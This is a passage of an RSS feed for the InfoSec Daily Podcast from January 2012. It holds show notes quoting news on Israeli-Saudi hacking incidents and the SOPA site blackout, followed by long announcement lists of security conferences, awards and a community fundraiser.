	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyber attacks come a week after an Israeli hacker, calling himself Hannibal, published personal information of thousands of Saudi Facebook users. The hacker claims to have acted in response to the Israeli credit card hack by Saudi-based hacker OxOmar, who exposed the details of 15,000 credit cards after breaking into the companies responsible for maintaining the information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyber attacks and counter attacks look set to escalate, with the IDF Team warning that if attacks from Saudi Arabia continue, they will &ldquo;move to the next level which will disable these sites longer term [and] may come to weeks or even months.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier this month, Danny Ayalon, Israel&rsquo;s foreign minister, said the credit card hack by OxOmar was comparable to terrorism and vowed to respond forcefully.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Israel has active capabilities for striking at those who are trying to harm it and no agency or hacker will be immune from retaliatory action,&quot; he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli credit card companies have dismissed the financial damage as minimal, but security experts have expressed concern about the potential use of stolen information by Israel&rsquo;s enemies.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Islamist group Hamas has described OxOmar&#39;s actions as &quot;a new form of resistance&quot;. Hamas urged Arab youth to use all means available in the virtual space to &ldquo;confront Israeli crimes&quot;, according to reports.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://thenextweb.com/insider/2012/01/18/how-much-would-facebook-google-or-twitter-lose-if-they-shut-down-for-one-day/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thenextweb.com/insider/2012/01/18/how-much-would-facebook-google-or-twitter-lose-if-they-shut-down-for-one-day/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With Wikipedia going through with its decision to shut down the site for 24 hours as part of their protest against SOPA, it&rsquo;s received quite a bit of criticism in the process for the decision. The Next Web&rsquo;s own Brad McCarty gave a pretty good argument for how Wikipedia could have used its site to raise awareness, in the same way it was able to raise money for its own cause.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course the Wikimedia Foundation doesn&rsquo;t have any revenue to speak of, but what if other sites had made the same decision? We&rsquo;ve put together a list of some of the Web&rsquo;s major sites and figured out approximately how much they stood to lose, based on their annual revenue, if they had followed in Wikipedia&rsquo;s footsteps.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-571-pentest-lessons-apachetomcat-hash-attack-muscovite-bank-remote-access-attacking-the-exchanges-cost-of-shutdown/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3392/0/infosec-daily-podcast-episode-571.mp3" length="18594313" type="audio/mpeg" />
		<itunes:duration>0:38:41</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 571 for January 18, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &#38; Geordy Rostad.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 571 for January 18, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &#38; Geordy Rostad.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	http://shmooconepilogue.eventbrite.com/
	 
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 570 &#8211; Blackout, No UEFI, Register HiJack, Targeting Kids, Dude Where’s My Twitter, iPhone 4S Jailbreak Near, &amp; Windows Cloud</title>
		<link>http://www.isdpodcast.com/episode-570-blackout-no-uefi-register-hijack-targeting-kids-dude-wheres-my-twitter-iphone-4s-jailbreak-near-windows-cloud</link>
		<comments>http://www.isdpodcast.com/episode-570-blackout-no-uefi-register-hijack-targeting-kids-dude-wheres-my-twitter-iphone-4s-jailbreak-near-windows-cloud#comments</comments>
		<pubDate>Wed, 18 Jan 2012 01:56:38 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3387</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 570 for January 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 570 for January 17, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 18, 2012<br class="kix-line-break" /><br />
	Where: NY Tech Meetup HQ, New York City</span><br />
	<a href="http://www.meetup.com/ny-tech/events/47879702/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
